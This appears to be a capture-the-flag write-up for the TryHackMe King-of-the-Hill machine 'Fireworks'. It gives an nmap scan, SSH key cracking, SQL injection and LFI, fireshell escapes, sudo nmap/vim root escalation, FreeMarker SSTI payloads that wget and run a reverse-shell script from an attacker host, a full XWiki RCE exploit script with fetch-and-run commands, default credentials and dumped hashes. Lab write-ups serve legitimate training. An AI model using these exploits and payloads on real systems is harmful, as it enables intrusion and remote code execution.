Fireworks

TryHackMe KoTH Machine - Fireworks

TryHackMe | Cyber Security TrainingTryHackMe

---

Port Scan -

PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0             236 Jul 04 11:04 employees.txt
| -rwxrwxr-x    1 0        0            2655 Jul 05 16:08 id_rsa
|_-rw-r--r--    1 0        0             257 Jul 04 10:13 memo.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:<ip>
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c9:9c:f1:2a:ca:83:c1:1d:54:67:2f:b7:6c:87:f7:80 (RSA)
|   256 ad:88:8b:1f:d2:f3:84:87:36:3c:9d:6d:b0:9e:31:2f (ECDSA)
|_  256 c0:da:7d:f1:88:c3:96:74:9b:17:f6:d1:da:69:db:1a (ED25519)
80/tcp   open  http       Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Music Gallery Site - PHP
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
8080/tcp open  http-proxy
| http-methods:
|_  Potentially risky methods: PUT PATCH DELETE
9999/tcp open  http       Werkzeug httpd 0.16.1 (Python 3.8.10)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/0.16.1 Python/3.8.10

Found an id_rsa private ssh key via ftp

• cracked pass for key - t<redacted>1

ssh2john id_rsa > forjohn
john forjohn -w=/usr/share/wordlists/rockyou.txt

Searching for music gallery site exploit

https://github.com/navaidzansari/CVE_Demo/blob/main/2023/Music%20Gallery%20Site%20-%20SQL%20Injection%201.md

Exploiting SQLI on endpoint /classes/Master.php -

It might be different endpoint, its random. Box even has a broken access control vuln, every poc you can find in above links

GET /classes/Master.php?f=get_music_details&id=1* HTTP/1.1
Host: 10.10.91.230
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=rat59huouim1urikmd93jonrtc
Upgrade-Insecure-Requests: 1

sqlmap -r req.txt --dbs

got admin hash after dumping the db

admin:A<redacted>1

LFI after admin dashboard access -

http://10.10.91.230/admin/?page=/etc/passwd

Initial Foothold on the box as david user using the id_rsa we found earlier -

ssh -i id_rsa david@ip

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
david:x:1001:1001:David Levinson,,,:/home/david:/usr/bin/fireshell
thomas:x:1002:1002:Thomas J Whitmore,,,:/home/thomas:/bin/bash
steven:x:1003:1003:Steven Hiller,,,:/home/steven:/bin/bash
ftp:x:115:122:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin

escape the fireshell -

notes
^R^X 
reset; bash 1>&0 2>&0

privesc to root -

TF=$(mktemp)
echo 'os.execute("/bin/bash")' > $TF
sudo nmap --script=$TF

Fireshell

#!/usr/bin/python3
import os
import subprocess
import shlex
from cmd import Cmd

HOMEDIR = os.path.expanduser(os.path.normpath('~'))
os.chdir(HOMEDIR)

class MyPrompt(Cmd):

    prompt = "fireshell>> "
    intro = "Welcome to fireshell :) input 'help' for a list of available commands. Powered by python Cmd!"

    def onecmd(self, line):
        try:
            return super().onecmd(line)
        except Exception as e:
            print(f"{e}")
            return False  # don't stop

    def do_exit(self, inp):
        print("Bye")
        return True

    def help_exit(self):
        print("Close this session")

    def default(self, inp):
        if inp == "q":
            return self.do_exit(inp)

        print("Default: {}".format(inp))

    def do_pwd(self, arg):
        res = subprocess.run('pwd', shell=True, text=True, capture_output=True).stdout
        print(res)

    def do_echo(self, arg):
        args = shlex.split(arg)
		res = subprocess.run(['echo', *args], text=True, capture_output=True).stdout
        print(res)

    def do_ls(self, arg):
        res = subprocess.run(['ls', HOMEDIR], text=True, capture_output=True).stdout
        print(res)

    def do_cat(self, arg):
        args = shlex.split(arg)

        if args[0][0] == '/':
            fname = args[0]
        else:
            fname = '~/' + args[0]
        fname = os.path.expanduser(os.path.normpath(fname))
        print(fname)
        if fname.startswith(HOMEDIR):
            res = subprocess.run(['cat', fname], text=True, capture_output=True).stdout
            print(res)
        else:
			print('You can only access files on the safe directory.')

    def do_ping(self, arg):
        args = shlex.split(arg)
        res = subprocess.run(['ping', '-c4', args[0]], text=True, capture_output=True)
        print(res.stderr)
        print(res.stdout)

    def do_notes(self, arg):
        my_env = {**os.environ, 'SHELL': '/usr/bin/bash'}
        res = subprocess.call('nano ' + HOMEDIR + '/notes.txt', shell=True, text=True, env=my_env)

    def do_monitor(self, arg):
        res = subprocess.call('top', shell=True, text=True)

    def do_shell(self, arg):
        print('Currently disabled for security reasons...')

if __name__ == "__main__":
    MyPrompt().cmdloop()

Port 8080 - mblog

    <!--
    ------------------------------------------------------
     _____ ______   ________  ___       ________  ________
    |\   _ \  _   \|\   __  \|\  \     |\   __  \|\   ____\
    \ \  \\\__\ \  \ \  \|\ /\ \  \    \ \  \|\  \ \  \___|
     \ \  \\|__| \  \ \   __  \ \  \    \ \  \\\  \ \  \  ___
      \ \  \    \ \  \ \  \|\  \ \  \____\ \  \\\  \ \  \|\  \
       \ \__\    \ \__\ \_______\ \_______\ \_______\ \_______\
        \|__|     \|__|\|_______|\|_______|\|_______|\|_______|
    ------------------------------------------------------------
    version: 3.5.0
    github : https://github.com/langhsu/mblog
    ------------------------------------------------------------
    -->

https://gitee.com/mtons/mblog

Default Admin Creds for mblog 3.5.0 -

admin:12345

SSTI - CVE-2024-28713

https://github.com/JiangXiaoBaiJia/cve/blob/main/Mblog%20blog%20system%20has%20SSTI%20template%20injection%20vulnerability.md
https://www.vicarius.io/vsociety/posts/ssti-in-mblog-351-a-tale-of-a-glorified-rce-cve-2024-28713-novel-exploit

index.ftl -

<#include "/default/inc/layout.ftl"/>
<#assign topId = 1 >>>
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("wget http://<ip>/revshell.sh")}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("bash revshell.sh")}

<@layout.extends name="/inc/layout.ftl">

    <@layout.put block="contents">
        <#assign topId = 1 />
        <!-- top -->
        <div class="row">
            <@contents channelId=topId size=8>

python3 mblog_ssti.py --url http://10.10.221.203:8080/ --username admin --password 12345 --theme-template-path voldemort/hoodtemp/vold.zip

Mysql db root pass -

root:P<redacted>1
debian-sys-maint:q<redacted>b

<#include "/default/inc/layout.ftl"/>
<#assign topId = 1 >>>
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("wget http://<ip>/revshell.sh")}
<#assign ex="freemarker.template.utility. Execute"?new()>${ex("bash revshell.sh")}

Xwiki on port 8080 -

8080/tcp open  http-proxy
| http-title: Home - XWiki
|_Requested resource was bin/view/Main/
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Script-Type: text/javascript
|     Set-Cookie: JSESSIONID=F72192932FE1B317F1B4B4C7B45E9075; Path=/; HttpOnly
|     Pragma: no-cache
|     Cache-Control: no-cache
|     Expires: Wed, 31 Dec 1969 23:59:59 GMT
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en
|     Content-Length: 35030
|     Date: Tue, 09 Jul 2024 17:58:43 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" data-xwiki-paged-media="paper" data-xwiki-reference="xwiki:Main.DocumentDoesNotExist.WebHome" data-xwiki-document="Main.DocumentDoesNotExist.WebHome" data-xwiki-wiki="xwiki" data-xwiki-space="Main.DocumentDoesNotExist" data-xwiki-page="WebHome" data-xwiki-isnew="true" data-xwiki-version="1.1" data-xwiki-rest-url="/rest/wikis/xwiki/spaces/Main/spaces/DocumentDoesNotExist/pages/WebHome" data-xwiki-locale="" data-xwiki-form-token="G
|   GetRequest:
|     HTTP/1.1 302
|     Content-Script-Type: text/javascript
|     Location: http://localhost:8080/bin/view/Main/
|     Content-Length: 0
|     Date: Tue, 09 Jul 2024 17:58:39 GMT
|     Connection: close
|   HTTPOptions:
|     HTTP/1.1 200
|     Content-Script-Type: text/javascript
|     Allow: GET, HEAD, TRACE, OPTIONS
|     Content-Length: 0
|     Date: Tue, 09 Jul 2024 17:58:39 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1924
|     Date: Tue, 09 Jul 2024 17:58:39 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_    Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP&#47;1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
| http-methods:
|_  Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests

Default admin creds -

admin:admin123

XWiki RCE (CVE-2024-31982) - exploit

https://www.vicarius.io/vsociety/posts/xwiki-rce-cve-2024-31982-exploit

import sys
import requests
import argparse
import re
import urllib3
import urllib.parse
from requests.exceptions import RequestException

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

VULNERABLE_ENDPOINT = "/bin/get/Main/DatabaseSearch?outputSyntax=plain&space=&text="

def extract_description(text):
    pattern = r'<description>RSS feed for search on \}\}\}(.*?)</description>'
    matches = re.findall(pattern, text, re.DOTALL)
    
    if matches:
        return matches[0]
    else:
        print("No text found in the response.")
        return None

def make_request(url):
    try:
        response = requests.get(url, verify=False, timeout=50)  # Skip SSL verification for simplicity
        if response.status_code == 200:
            return response.text
        else:
            return None
    except RequestException:
        return None

def test_host(url, cmd):
    try:
        groovy_cmd = (
            "def sout = new StringBuilder(), serr = new StringBuilder(); "
            "def proc = '{cmd}'.execute(); proc.consumeProcessOutput(sout, serr); "
            "proc.waitForOrKill(1000); println \"$sout\";".format(cmd=cmd)
        )

        payload = '}}}{{async async=false}}{{groovy}}' + groovy_cmd + '{{/groovy}}{{/async}}'

        encoded_payload = urllib.parse.quote_plus(payload).replace('&gt;','<')

        fullurl = f"{url}{VULNERABLE_ENDPOINT}{encoded_payload}"
        body = make_request(fullurl)
        
        if body:
            extracted_text = extract_description(body)
            if extracted_text:
                print(extracted_text)
    except RequestException:
        print(f"Timeout: {url}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='POC for CVE-2024-31982: XWiki Platform Remote Code Execution.')
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., http://target)')
    parser.add_argument('-c', '--cmd', required=True, help='Cmd to run')
    args = parser.parse_args()

    test_host(args.url, args.cmd)

python3 xwiki_rce.py -u http://10.10.145.232:8080 -c "wget <ip>/vold.sh"
python3 xwiki_rce.py -u http://10.10.145.232:8080 -c "chmod +x vold.sh"
python3 xwiki_rce.py -u http://10.10.145.232:8080 -c "./vold.sh"

ls -l /root/id_rsa

Thomas user from docker -

sudo vim /etc/hosts
:!/bin/bash

username="tomcat" password="s3cret" 

Fireshell 3 - escape less

notes
!/bin/bash

Magento 2.4.6 - Bitnami on port 8080 -

db' => [
        'table_prefix' => '',
        'connection' => [
            'default' => [
                'host' => 'mariadb:3306',
                'dbname' => 'bitnami_magento',
                'username' => 'bn_magento',
                'password' => 'S<redacted>7',
                'model' => 'mysql4',
                'engine' => 'innodb',
                'initStatements' => 'SET NAMES utf8;',
                'active' => '1',
                'driver_options' => [
                    1014 => false
                ]
            ]
        ]

+-------------+---------+-------------------------------------------------------------------------------------------------------------------+
| password_id | user_id | password_hash                                                                                                     |
+-------------+---------+-------------------------------------------------------------------------------------------------------------------+
|           1 |       1 | bc88e499a457950a30200af2ebc6127227a0026a9de2b20908f58aadaa269dcf:3D49Qomw5wtDm4ibNpTzIzMufvJJhFq2:3_32_2_67108864 |   
|           2 |       2 | abd404f51885e94e0217d6620b80f782706eb299c461189d18de3772165bea54:16y3e0yCyuwFUVLvi4chSeSNYZ5biG9m:3_32_2_67108864 |  
|           3 |       2 | 21664bec41130a45ac6ae202cc7a75a5f24f394beffabe66bdaa1a540b178376:ErJZDzUBi9ls9MULLlcKQdZ3SccSUnsJ:3_32_2_67108864 | -> admin
+-------------+---------+-------------------------------------------------------------------------------------------------------------------+

JWT Cryptographic key /bitnami/magento/app/etc/env.php

fd2<redacted>8

XXE Magento -

https://github.com/bigb0x/CVE-2024-34102/blob/main/cve-2024-34102.py

Thomas id_rsa path

/bitnami/magento/pub/media/downloadable/files/links/i/d/id_rsa

Grep pattern to search for flags -

grep -RrioE "thm{.*?" / 2>/dev/null